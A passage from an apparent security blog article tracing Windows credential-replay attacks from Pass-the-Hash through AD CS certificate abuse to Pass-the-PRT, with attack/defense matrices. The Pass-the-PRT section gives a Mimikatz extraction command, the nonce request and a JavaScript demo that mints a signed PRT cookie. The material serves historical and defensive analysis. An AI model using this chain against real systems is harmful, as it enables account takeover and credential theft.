&lt;p&gt;The current state of the catalog: as of the 2025 Certipy 5.x documentation, ESC1 through ESC16 is the practitioner enumeration, with each technique characterised by a template-level, ACL-level, CA-administrator-level, NTLM-relay-level, SID-extension-level, or mapping-level abuse primitive [@certipy-wiki-privesc]. Microsoft Defender for Identity&apos;s certificates posture assessment tracks nine distinct ESC numbers as of the 2025 documentation -- ten posture assessments, because ESC4 owner and ESC4 ACL are tracked as separate sub-cases (ESC1, ESC2, ESC3, ESC4 owner, ESC4 ACL, ESC6 preview, ESC7, ESC8, ESC11, ESC15) [@ms-defender-id-certs]. Same pattern as Pass-the-Hash in 2012-2014: documentation tells administrators what to do; the structural exposure is downstream of how each enterprise built its templates years earlier.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;ESC ID&lt;/th&gt;
&lt;th&gt;Class&lt;/th&gt;
&lt;th&gt;Closed by KB5014754&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;ESC1&lt;/td&gt;
&lt;td&gt;Template -- enrollee supplies SAN, client-auth EKU, permissive enrollment&lt;/td&gt;
&lt;td&gt;Partial: SID extension binds requester at issuance; ESC1 still works if the SID extension is absent&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ESC2&lt;/td&gt;
&lt;td&gt;Template -- enrollee supplies SAN, Any-Purpose or no EKU&lt;/td&gt;
&lt;td&gt;No -- administrative hardening&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ESC3&lt;/td&gt;
&lt;td&gt;Template -- Certificate Request Agent enrollment-agent abuse&lt;/td&gt;
&lt;td&gt;No -- administrative hardening&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ESC4&lt;/td&gt;
&lt;td&gt;ACL -- writeable template configuration&lt;/td&gt;
&lt;td&gt;No -- administrative hardening&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ESC6&lt;/td&gt;
&lt;td&gt;CA -- &lt;code&gt;EDITF_ATTRIBUTESUBJECTALTNAME2&lt;/code&gt; flag set on the CA&lt;/td&gt;
&lt;td&gt;No -- CA-level hardening (was MS22-23, separately patched)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ESC8&lt;/td&gt;
&lt;td&gt;NTLM relay -- HTTP enrolment endpoints reachable from low-privilege contexts&lt;/td&gt;
&lt;td&gt;No -- relay-defence hardening&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ESC9&lt;/td&gt;
&lt;td&gt;Template -- &lt;code&gt;CT_FLAG_NO_SECURITY_EXTENSION&lt;/code&gt; exempts template from the SID extension&lt;/td&gt;
&lt;td&gt;No -- by design&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ESC11&lt;/td&gt;
&lt;td&gt;NTLM relay -- ICPR RPC endpoint without sign / seal&lt;/td&gt;
&lt;td&gt;No -- relay-defence hardening&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ESC16&lt;/td&gt;
&lt;td&gt;CA -- security-extension disabled at the CA level&lt;/td&gt;
&lt;td&gt;No -- CA-level hardening&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;&lt;em&gt;Table 1. A representative slice of the ESC1-ESC16 catalog showing what KB5014754 closes and what remains administrative hardening [@specterops-certify-wiki] [@certipy-wiki-privesc] [@specterops-certs-patches-2022].&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;KB5014754 is a CVE-class fix for one sub-case. The broader ADCS catalog is administrative hardening. And the &lt;em&gt;next&lt;/em&gt; credential type -- the one that defeats Credential Guard, Protected Users, and KB5014754 simultaneously -- was already shipping in commodity Mimikatz code by August 2020.&lt;/p&gt;
&lt;h2&gt;8. Pass-the-PRT: The CloudAP Frontier&lt;/h2&gt;
&lt;p&gt;By August 2020, Microsoft had two architectural defenses against credential replay that the security industry actually trusted: Credential Guard for local Active Directory credentials, and (eighteen months later) KB5014754 for the certificate-replay class. Then a Dutch security researcher named Dirk-jan Mollema published a 21-minute read that broke both, in the same paragraph, by stealing a different credential type.&lt;/p&gt;
&lt;p&gt;The credential is the &lt;a href=&quot;https://paragmali.com/blog/inside-the-primary-refresh-token-the-cryptographic-seam-betw/&quot; rel=&quot;noopener&quot;&gt;Primary Refresh Token&lt;/a&gt;. The two foundational write-ups are Mollema&apos;s &quot;Abusing Azure AD SSO with the Primary Refresh Token&quot; [@mollema-prt-abusing] and its follow-on &quot;Digging further into the Primary Refresh Token&quot; [@mollema-prt-digging], both posted in August 2020. The second post is the single most-cited primary source in the fifth generation of the family. Read it once and you understand why Pass-the-PRT is structurally different from everything that came before.&lt;/p&gt;
&lt;p&gt;A PRT is an opaque refresh-token artifact issued by Microsoft Entra ID (formerly Azure AD) to a broker on Entra-joined or Hybrid-joined Windows devices, paired with a session key (an HMAC-SHA256 secret) used for proof-of-possession and bound to the device keys registered at device join.&lt;/p&gt;
&lt;p&gt;The Microsoft Entra documentation describes the artefact precisely: &quot;A Primary Refresh Token (PRT) is a key artifact of Microsoft Entra authentication ... Once issued, a PRT is valid for 90 days and is continuously renewed as long as the user actively uses the device.&quot; [@ms-entra-concept-prt] On Windows the PRT is renewed every four hours during sign-in. The device-key registration binds the PRT to the device that owns it -- and is what an attacker has to work around to use a stolen PRT on a different device.&lt;/p&gt;

The Microsoft Entra-issued long-lived refresh token for SSO on Entra-joined or Hybrid-joined Windows devices. Carries a session key (HMAC-SHA256) used to sign per-request `x-ms-RefreshTokenCredential` cookies, and binds to a device transport key registered at device join. Default lifetime is 90 days with sliding renewal as long as the user actively uses the device; an inactivity timeout governs when an idle PRT must be re-acquired [@ms-entra-concept-prt]. The PRT is the load-bearing artefact for Single Sign-On to every Entra-integrated resource the device&apos;s user can reach.
&lt;p&gt;The PRT default lifetime is 90 days per the Microsoft Entra documentation, with renewal every four hours during Windows sign-in [@ms-entra-concept-prt]. The 14-day figure that sometimes appears in secondary references is the inactivity timeout on certain device states, not the PRT lifetime itself; this article uses the Microsoft Entra documentation&apos;s value to avoid the conflation.&lt;/p&gt;
&lt;p&gt;Where the PRT &lt;em&gt;lives&lt;/em&gt; is what makes the rest of the architecture work -- and what makes it vulnerable. The PRT is &lt;em&gt;hybrid&lt;/em&gt;: issued and revoked cloud-side by Entra ID, stored and used client-side via the &lt;strong&gt;CloudAP&lt;/strong&gt; authentication plug-in, which is loaded into LSASS like any other Windows authentication package.&lt;/p&gt;
&lt;p&gt;The load-bearing structural fact is that CloudAP is &lt;em&gt;in LSASS&lt;/em&gt;, not behind the LSAISO trustlet. Credential Guard&apos;s classical isolation does not extend to the CloudAP plug-in&apos;s working memory, because Credential Guard&apos;s scope is the three credential categories its design predates -- NT hashes, Kerberos TGTs, and &quot;domain credentials&quot; -- and the PRT is none of those [@mollema-prt-abusing].&lt;/p&gt;

The Windows authentication package (`cloudap.dll`, loaded into LSASS) that handles authentication against Microsoft Entra ID for Entra-joined and Hybrid-joined devices. Holds the device&apos;s Primary Refresh Token, its session key, and the derived material used to sign per-request PRT cookies. Sits inside LSASS in VTL0, *not* inside the LSAISO trustlet in VTL1; Credential Guard does not currently extend its isolation to CloudAP&apos;s working memory.
&lt;p&gt;The mechanism, as Mollema and Delpy developed it through the second half of 2020, runs as follows. Mimikatz &lt;code&gt;dpapi::cloudapkd /unprotect&lt;/code&gt; extracts the PRT (the encrypted-by-Entra refresh-token blob) and the session key from CloudAP&apos;s working memory.&lt;/p&gt;
&lt;p&gt;The attacker constructs an &lt;code&gt;x-ms-RefreshTokenCredential&lt;/code&gt; JWT carrying the PRT in the &lt;code&gt;refresh_token&lt;/code&gt; claim, &lt;code&gt;is_primary: true&lt;/code&gt;, and a &lt;code&gt;request_nonce&lt;/code&gt; obtained by an unauthenticated POST against the Entra ID v1 token endpoint at &lt;code&gt;https://login.microsoftonline.com/common/oauth2/token&lt;/code&gt; with form-encoded body &lt;code&gt;grant_type=srv_challenge&lt;/code&gt; (the server-challenge nonce pattern used by the ROADtools &lt;code&gt;roadtx prt&lt;/code&gt; reference implementation; the response is a JSON object with a &lt;code&gt;Nonce&lt;/code&gt; field). The signature is HMAC-SHA256 over the JWT under the session key. The completed cookie is presented to &lt;code&gt;login.microsoftonline.com&lt;/code&gt; from any machine, and Entra ID returns access and refresh tokens for any resource the original user can reach. Mollema&apos;s second post describes the collaboration that built the tooling:&lt;/p&gt;

Around the same time Benjamin Delpy took up my &apos;challenge&apos; of recovering PRT data from `lsass` with mimikatz. We combined forces and ended up with tooling that is not only able to extract the PRT and associated cryptographic keys (such as the session key) from memory, but can also use these keys to create new SSO cookies or modify existing ones. -- Dirk-jan Mollema, *Digging further into the Primary Refresh Token* [@mollema-prt-digging]
&lt;p&gt;The operational tooling closed quickly. Mollema&apos;s &lt;code&gt;roadtx prt&lt;/code&gt; (part of ROADtools [@roadtools-github]) automates the full chain end-to-end -- extract the material, mint the cookie, complete the OAuth dance, hand the attacker an access token. The Mimikatz &lt;code&gt;dpapi::cloudapkd&lt;/code&gt; command landed in the open-source repository the same window. Pass-the-PRT moved from research artefact to commodity tooling in months, not years.&lt;/p&gt;

sequenceDiagram
    participant Victim as Victim device (Entra-joined)
    participant Attacker as Attacker device
    participant Entra as login.microsoftonline.com
    Note over Victim: PRT plus session key held by CloudAP in LSASS
    Attacker-&amp;gt;&amp;gt;Victim: mimikatz dpapi::cloudapkd /unprotect
    Victim--&amp;gt;&amp;gt;Attacker: PRT (encrypted blob) plus session key
    Attacker-&amp;gt;&amp;gt;Entra: POST /common/oauth2/token grant_type=srv_challenge (unauthenticated)
    Entra--&amp;gt;&amp;gt;Attacker: request_nonce
    Note over Attacker: Build x-ms-RefreshTokenCredential JWT
    Note over Attacker: Sign HMAC-SHA256 with extracted session key
    Attacker-&amp;gt;&amp;gt;Entra: POST /token with PRT cookie
    Entra--&amp;gt;&amp;gt;Attacker: Access and refresh tokens
    Attacker-&amp;gt;&amp;gt;Attacker: Authenticate to any Entra resource as victim user
&lt;p&gt;Now the analytical core. Pass-the-PRT defeats three Microsoft defenses &lt;em&gt;simultaneously&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;First, &lt;strong&gt;Credential Guard&lt;/strong&gt; is out of scope. The CloudAP material is not an NT hash, not a Kerberos TGT, and not &quot;credentials stored by applications as domain credentials&quot; in the verbatim sense the Credential Guard documentation uses. Credential Guard&apos;s VBS-based isolation does not extend to CloudAP. The defense was designed in 2015 against the three credential types the family had then; the PRT is a credential type the family had not yet evolved into [@ms-learn-credential-guard].&lt;/p&gt;
&lt;p&gt;Second, &lt;strong&gt;KB5014754&lt;/strong&gt; is out of scope. The PRT cookie does not traverse the KDC&apos;s certificate-mapping logic at all; it is a JWT signed by an HMAC and authenticated at the Entra ID token endpoint. The strong certificate mapping that Microsoft drove through five years of audit-to-enforcement timeline has no relevance to a credential that never touches the KDC [@ms-kb5014754].&lt;/p&gt;
&lt;p&gt;Third, &lt;strong&gt;Protected Users&lt;/strong&gt; is out of scope. Protected Users is an Active-Directory-only construct, enforced on Windows Server domain controllers and on AD-joined member devices. Entra ID is a separate identity provider with separate enforcement; the 240-minute TGT cap, the NTLM ban, and the RC4 ban that Protected Users enforces simply do not apply [@ms-protected-users].&lt;/p&gt;
&lt;p&gt;The TPM-sealing finding is where the architectural pattern becomes most precise. Microsoft began sealing the PRT session key to a &lt;a href=&quot;https://paragmali.com/blog/the-tpm-in-windows-one-primitive-twenty-five-years-and-the-c/&quot; rel=&quot;noopener&quot;&gt;TPM-bound key&lt;/a&gt; on TPM-2.0-eligible hardware -- a defense that, in principle, makes the raw session key cryptographically non-exportable. Mollema&apos;s finding in the August 2020 second post is that the seal does not close the attack, because CloudAP holds &lt;em&gt;derived&lt;/em&gt; PRT-cookie-signing material in its own working memory in LSASS, and the attacker only needs the derived material:&lt;/p&gt;

despite the session key of the PRT is stored in the TPM whenever possible, this doesn&apos;t prevent us from extracting the PRT and the required information to create SSO cookies. The result of this is that regardless of whether the PRT is protected by the TPM or not, with Administrator access it is possible to extract the PRT from LSASS and use the PRT on a different device than it was issued to. -- Dirk-jan Mollema, *Digging further into the Primary Refresh Token* [@mollema-prt-digging]
&lt;p&gt;The structural reason the standard hardware-rooted defense pattern does not transfer: the attacker does not need the raw session key out of the TPM. They need only the in-memory derived material CloudAP itself uses to sign the cookies, and that derived material lives in the same address space Credential Guard does not isolate.&lt;/p&gt;
&lt;p&gt;The TPM seals the key. CloudAP uses the key. Whatever CloudAP can read, an attacker with administrator and a memory-access primitive can also read. The defense pattern that worked for NT hashes (move them out of the address space) has not been applied to CloudAP -- and until it is, the TPM seal is a speed bump rather than a wall.&lt;/p&gt;
&lt;p&gt;{`
// Pedagogical demonstration of the JWT structure used in Pass-the-PRT
// cookie minting. Uses placeholder values throughout; no real PRT material.&lt;/p&gt;
&lt;p&gt;const base64url = (buf) =&amp;gt; Buffer.from(buf).toString(&apos;base64&apos;)
  .replace(/=+$/, &apos;&apos;).replace(/\+/g, &apos;-&apos;).replace(/\//g, &apos;_&apos;);&lt;/p&gt;
&lt;p&gt;const header = { alg: &apos;HS256&apos;, ctx: &apos;AAAAAAAA&apos; };
const payload = {
  // The PRT itself, an opaque refresh-token string Entra issued to the
  // device. In a real attack this comes from mimikatz dpapi::cloudapkd.
  refresh_token: &apos;AQABAAAAAAA...redacted...&apos;,
  // Marks this cookie as a primary refresh token cookie.
  is_primary: &apos;true&apos;,
  // Fresh nonce from an unauthenticated POST against the v1 token endpoint
  // at login.microsoftonline.com/common/oauth2/token with form body
  // grant_type=srv_challenge (returns JSON with Nonce field; the canonical
  // server-challenge pattern used by ROADtools roadtx prt).
  request_nonce: &apos;AwABAAEAAAAC...&apos;,
  iat: Math.floor(Date.now() / 1000),
};&lt;/p&gt;
&lt;p&gt;// HMAC-SHA256 over the JWT under the session key recovered from CloudAP.
// Placeholder key for demonstration only.
const sessionKey = Buffer.alloc(32); // 32 bytes of zeros (fake)
const crypto = require(&apos;crypto&apos;);&lt;/p&gt;
&lt;p&gt;const h = base64url(JSON.stringify(header));
const p = base64url(JSON.stringify(payload));
const sig = base64url(
  crypto.createHmac(&apos;sha256&apos;, sessionKey).update(h + &apos;.&apos; + p).digest()
);&lt;/p&gt;
&lt;p&gt;console.log(&apos;Header segment:    &apos; + h);
console.log(&apos;Payload segment:   &apos; + p);
console.log(&apos;Signature segment: &apos; + sig);
console.log();
console.log(&apos;Full PRT cookie: &apos; + h + &apos;.&apos; + p + &apos;.&apos; + sig);
// In a real attack the attacker would now POST this as the
// x-ms-RefreshTokenCredential cookie to login.microsoftonline.com.
`}&lt;/p&gt;
&lt;p&gt;The current partial mitigations are worth enumerating, because none of them closes the gap.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Token Protection&lt;/strong&gt; (a &lt;a href=&quot;https://paragmali.com/blog/who-decided-this-token-is-good-a-field-guide-to-conditional-/&quot; rel=&quot;noopener&quot;&gt;Conditional Access&lt;/a&gt; session control) attempts to ensure that only device-bound sign-in session tokens are accepted at the Entra ID token endpoint for protected resources. The Microsoft Learn page is explicit about both the design intent and the deployment limits: &quot;Token Protection is a Conditional Access session control that attempts to reduce token replay attacks by ensuring only device bound sign-in session tokens, like Primary Refresh Tokens (PRTs), are accepted by Microsoft Entra ID when applications request access to protected resources.&quot; [@ms-entra-token-protection] As of the current documentation the &lt;em&gt;supported resources&lt;/em&gt; are five named applications: Exchange Online, SharePoint Online, Microsoft Teams, Azure Virtual Desktop, and Windows 365. Browser applications are out of scope; &quot;Token Protection currently supports native applications only. Browser-based applications are not supported.&quot; [@ms-entra-token-protection] Most Entra-integrated SaaS is unbound.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Continuous Access Evaluation&lt;/strong&gt; (CAE) shortens the window during which a stolen PRT is operationally usable, by allowing the token endpoint to revoke tokens within minutes of a triggering signal (password change, risk-based detection, conditional-access policy update) [@ms-entra-cae]. CAE is evaluation-time, not isolation. It shortens the window between extraction and detection-driven revocation; it does not prevent extraction.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Hybrid-joined PRT renewal binding&lt;/strong&gt; partially closes the cross-tenant case for hybrid Azure AD Join configurations, but does not address the same-tenant Pass-the-PRT case that Mollema&apos;s original 2020 posts described [@ms-entra-hybrid-join-plan].&lt;/p&gt;
&lt;p&gt;The institutional acknowledgment of the supersession pattern is the verbatim Microsoft Learn sentence already quoted in section 6 [@ms-learn-credential-guard]: written about the 2015 Credential Guard architecture, it accurately predicts the 2020 Pass-the-PRT shift. The credential-replay family has reached the point where &lt;em&gt;every Microsoft defense&lt;/em&gt; in the on-prem stack runs in parallel against an attack the on-prem stack cannot reach.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Pass-the-PRT defeats Credential Guard, KB5014754, and Protected Users simultaneously because each defense was designed around a different long-term artefact, and the PRT is none of them. The architectural property -- a long-term authentication artefact reachable from the using process is replayable -- is unchanged. The artefact moved.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Six years after Mollema&apos;s disclosure, the TPM-resilience finding still holds. The CloudAP plug-in is still in LSASS. Credential Guard still does not extend its boundary. Pass-the-PRT remains the operational frontier in 2026.&lt;/p&gt;
&lt;h2&gt;9. The 5x5 Matrix and the Irregular Cadence&lt;/h2&gt;
&lt;p&gt;Five generations of attack. Five generations of defense. They map onto each other unevenly; the gaps are not five years.&lt;/p&gt;
&lt;p&gt;The matrix below consolidates the lineage at a glance. Rows are the attack generations (in the order they entered the practitioner literature). Columns are the defense generations (in the order they shipped). Each cell records whether that defense closes that attack on a fully-deployed hardware-eligible 2026 Windows 11 endpoint with the control turned on. &quot;Closed&quot; means the attack returns empty buffers or fails authentication; &quot;Partial&quot; means the defense increases attacker cost or closes one sub-case; &quot;Open&quot; means the defense&apos;s design scope does not include that attack.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Attack \ Defense&lt;/th&gt;
&lt;th&gt;Mitigating-PtH whitepapers (2012/2014)&lt;/th&gt;
&lt;th&gt;Protected Users + RunAsPPL + Restricted Admin (2013-2014)&lt;/th&gt;
&lt;th&gt;Credential Guard / LSAISO (2015)&lt;/th&gt;
&lt;th&gt;KB5014754 strong mapping (2022)&lt;/th&gt;
&lt;th&gt;Token Protection + CAE (2023-2025)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Pass-the-Hash (Ashton 1997, Ochoa 2008)&lt;/td&gt;
&lt;td&gt;Open (documentation)&lt;/td&gt;
&lt;td&gt;Partial (Protected Users members)&lt;/td&gt;
&lt;td&gt;Closed (on enabled endpoints)&lt;/td&gt;
&lt;td&gt;Open (not in scope)&lt;/td&gt;
&lt;td&gt;Open (not in scope)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Pass-the-Ticket (Delpy 2011, Duckwall+Delpy 2014)&lt;/td&gt;
&lt;td&gt;Open (documentation)&lt;/td&gt;
&lt;td&gt;Partial (4-hour TGT cap for Protected Users)&lt;/td&gt;
&lt;td&gt;Closed (TGT session key in LSAISO)&lt;/td&gt;
&lt;td&gt;Open (not in scope)&lt;/td&gt;
&lt;td&gt;Open (not in scope)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Overpass-the-Hash (Delpy / Metcalf 2014)&lt;/td&gt;
&lt;td&gt;Open (documentation)&lt;/td&gt;
&lt;td&gt;Partial (RC4 banned for Protected Users)&lt;/td&gt;
&lt;td&gt;Closed (NT hash in LSAISO)&lt;/td&gt;
&lt;td&gt;Open (not in scope)&lt;/td&gt;
&lt;td&gt;Open (not in scope)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Pass-the-Certificate (Schroeder + Christensen 2021, Méheut 2022)&lt;/td&gt;
&lt;td&gt;Open (documentation)&lt;/td&gt;
&lt;td&gt;Open (cert keys outside scope)&lt;/td&gt;
&lt;td&gt;Open (cert keys outside scope)&lt;/td&gt;
&lt;td&gt;Partial (closes Certifried sub-case; ESC2-ESC16 remain)&lt;/td&gt;
&lt;td&gt;Open (not in scope)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Pass-the-PRT (Mollema + Delpy 2020)&lt;/td&gt;
&lt;td&gt;Open (Entra ID is separate IDP)&lt;/td&gt;
&lt;td&gt;Open (Entra ID is separate IDP)&lt;/td&gt;
&lt;td&gt;Open (CloudAP not in LSAISO)&lt;/td&gt;
&lt;td&gt;Open (not in scope)&lt;/td&gt;
&lt;td&gt;Partial (5 named resources; browser apps out of scope)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;&lt;em&gt;Table 2. The 5x5 attack/defense matrix. The union of every cell in the rightmost column of &quot;Closed&quot; entries is the set of attacks Microsoft&apos;s published 2026 defenses close on hardware-eligible non-DC endpoints with every control turned on; that set is precisely the first three rows.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The matrix makes the structure visible. No single defense closes all attacks, and no single attack is closed by all defenses. The union of every defense closes Pass-the-Hash, Pass-the-Ticket, and Overpass-the-Hash on hardware-eligible non-DC Windows 10/11 systems with all controls enabled. It partially closes Pass-the-Certificate (for the Certifried sub-case) and partially closes Pass-the-PRT (for five named resources). Both of the most recent generations remain operationally open against any deployment that does not run those specific controls -- which is most deployments.&lt;/p&gt;
&lt;p&gt;The cadence is just as uneven as the matrix. The original input that prompted this article claimed &quot;every Windows defense against credential replay buys about five years before the attack class evolves to the next credential type.&quot; Memorable. Also wrong. The actual timeline produces gaps from eleven months to eleven years, with one negative interval:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;1997 -&amp;gt; 2008&lt;/strong&gt; (eleven years) for the Samba-patch -&amp;gt; Windows-native pivot. Pass-the-Hash existed for over a decade as a Unix-side novelty before Ochoa&apos;s LSASS-injection insight made it Windows-native.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;2008 -&amp;gt; 2011&lt;/strong&gt; (three years) for the Mimikatz Pass-the-Ticket extension. The same memory-access primitive that animated &lt;code&gt;IAM.EXE&lt;/code&gt; was retargeted at a different artefact.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;2012/2014 -&amp;gt; 2015&lt;/strong&gt; (one to three years) for the Mitigating-PtH whitepapers -&amp;gt; Credential Guard pivot. Documentation took a year and a half to ship; the architectural counter took another.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;2021 -&amp;gt; 2022&lt;/strong&gt; (eleven months) for the AD CS catalog -&amp;gt; KB5014754 response. Coordinated disclosure compressed this gap; Certifried&apos;s CVE-class status forced a CVE-class response.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;2020 -&amp;gt; 2025+&lt;/strong&gt; (open-ended) for Pass-the-PRT with no Credential-Guard-equivalent shipped. As of the Windows 11 25H2 cycle there is no public roadmap for VBS-class isolation of CloudAP material.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The most striking gap is the 2020/2021 &lt;em&gt;negative&lt;/em&gt; interval. Pass-the-PRT (Mollema, August 2020) and the AD CS catalog (Schroeder + Christensen, June 2021) are siblings rather than sequential; Pass-the-PRT predates Pass-the-Certificate as a &lt;em&gt;named technique&lt;/em&gt; by ten months, even though the article treats them as Generation 4 and Generation 5 in narrative order. The Generation N -&amp;gt; N+1 framing is &lt;em&gt;taxonomic&lt;/em&gt;, not strictly chronological. The reader needs this distinction to read the lineage accurately: the attack class evolves along the architectural property, not along the calendar.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The &quot;every Windows defense buys five years&quot; framing is what you see if you select the cleanest pairings (Mitigating-PtH 2012/2014 to Credential Guard 2015 plus an artificial 2020-targeted &quot;next attack&quot;). When you look at the actual intervals, you see eleven years (1997-2008), three years (2008-2011), eleven months (2021-2022), and an open-ended interval (2020 onwards). The pattern is the architectural property persisting across artefact changes, not a calendar drumbeat.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The storage-class progression is the cleanest way to see the property hold across the lineage. Each row names the long-term artefact, where it lives, and which defense moved or shielded that storage class.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Generation&lt;/th&gt;
&lt;th&gt;Long-term artefact&lt;/th&gt;
&lt;th&gt;Storage location&lt;/th&gt;
&lt;th&gt;Defense that isolated it&lt;/th&gt;
&lt;th&gt;Status 2026&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;1A (1997 Samba)&lt;/td&gt;
&lt;td&gt;NT hash (and LM hash)&lt;/td&gt;
&lt;td&gt;Attacker-supplied hash (Samba &lt;code&gt;smbpasswd&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;&quot;Do not store LAN Manager hash&quot; policy (Vista default-on); SAM hash extraction still works&lt;/td&gt;
&lt;td&gt;LM hash retired; NT hash extraction still works&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;1B (2008 Windows-native)&lt;/td&gt;
&lt;td&gt;NT hash&lt;/td&gt;
&lt;td&gt;LSASS credential cache&lt;/td&gt;
&lt;td&gt;Credential Guard relocates to LSAISO&lt;/td&gt;
&lt;td&gt;Closed on Credential-Guard-enabled endpoints&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2 (2011 Mimikatz)&lt;/td&gt;
&lt;td&gt;Kerberos TGT plus session key&lt;/td&gt;
&lt;td&gt;LSASS Kerberos package&lt;/td&gt;
&lt;td&gt;Credential Guard relocates to LSAISO&lt;/td&gt;
&lt;td&gt;Closed on Credential-Guard-enabled endpoints&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3 (2014)&lt;/td&gt;
&lt;td&gt;NT hash promoted to RC4-HMAC Kerberos key&lt;/td&gt;
&lt;td&gt;LSASS, same buffer as Pass-the-Hash&lt;/td&gt;
&lt;td&gt;Credential Guard relocates to LSAISO; KB5021131 makes AES the default&lt;/td&gt;
&lt;td&gt;Closed on Credential-Guard-enabled endpoints; RC4 deprecated in favour of AES [@ms-kb5021131]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4 (2021 AD CS catalog)&lt;/td&gt;
&lt;td&gt;X.509 certificate private key&lt;/td&gt;
&lt;td&gt;CryptoAPI key container, TPM, or smart card&lt;/td&gt;
&lt;td&gt;TPM-resident or VSC-resident keys are cryptographically non-exportable; KB5014754 binds certificates to SIDs at issuance&lt;/td&gt;
&lt;td&gt;Partial; ESC2-ESC16 misconfigurations remain administrative hardening&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5 (2020 Pass-the-PRT)&lt;/td&gt;
&lt;td&gt;PRT session key plus derived signing material&lt;/td&gt;
&lt;td&gt;CloudAP plug-in in LSASS (session key optionally TPM-sealed)&lt;/td&gt;
&lt;td&gt;None deployed; Token Protection partially shields five resources&lt;/td&gt;
&lt;td&gt;Open&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;&lt;em&gt;Table 3. Storage-class progression. Each attack generation targets the next long-term artefact whose storage location is not isolated by the previous generation&apos;s defense.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The matrix and the storage-class table jointly produce the structural prediction: each generation shifts to the next available long-term artefact whose storage class the latest defense does not isolate. The graph-based formalisation of these storage-class transitions is the BloodHound edge catalog -- the &lt;code&gt;HasSession&lt;/code&gt;, &lt;code&gt;AdminTo&lt;/code&gt;, and &lt;code&gt;CanRDP&lt;/code&gt; family that operationalises &quot;which principal can reach which credential from where&quot; as a queryable property of an enterprise&apos;s directory [@bloodhound-edges]. The pattern predicts a Generation 6 outside whatever isolation scope arrives next.&lt;/p&gt;
&lt;p&gt;The most credible candidate today is &lt;strong&gt;Pass-the-DeviceKey&lt;/strong&gt;: extraction or abuse of the device transport key the PRT binds to, or of the CloudAP-derived material the cookie-signing process produces from it [@mollema-prt-phishing]. Mollema&apos;s 2023-2025 continuation work documents the underlying device-transport-key primitives in detail; the September 2025 Actor-tokens disclosure (CVE-2025-55241) demonstrated a fully operational cross-tenant impersonation primitive, responsibly disclosed and patched before any in-the-wild abuse, an adjacent cloud-token-validation failure rather than a device-key primitive [@mollema-actor-tokens] [@mollema-federated-credentials].&lt;/p&gt;

flowchart TD
    A1[Pass-the-Hash 1A Samba&lt;br /&gt;Ashton 1997]
    A2[Pass-the-Hash 1B Windows-native&lt;br /&gt;Ochoa 2008]
    A3[Pass-the-Ticket&lt;br /&gt;Delpy 2011]
    A4[Overpass-the-Hash&lt;br /&gt;Delpy / Metcalf 2014]
    A5[Pass-the-Certificate&lt;br /&gt;Schroeder + Christensen 2021]
    A6[Pass-the-PRT&lt;br /&gt;Mollema + Delpy 2020]
    A7[Pass-the-DeviceKey forecast]
    D1[Mitigating-PtH whitepapers&lt;br /&gt;v1 2012, v2 2014]
    D2[Protected Users + RunAsPPL + Restricted Admin&lt;br /&gt;2013-2014]
    D3[Credential Guard / LSAISO&lt;br /&gt;2015, default 2022]
    D4[KB5014754 strong mapping&lt;br /&gt;2022, enforced 2025]
    D5[Token Protection + CAE&lt;br /&gt;2023-2025]
    D6[CloudAP isolation forecast]
    A1 --&amp;gt; A2
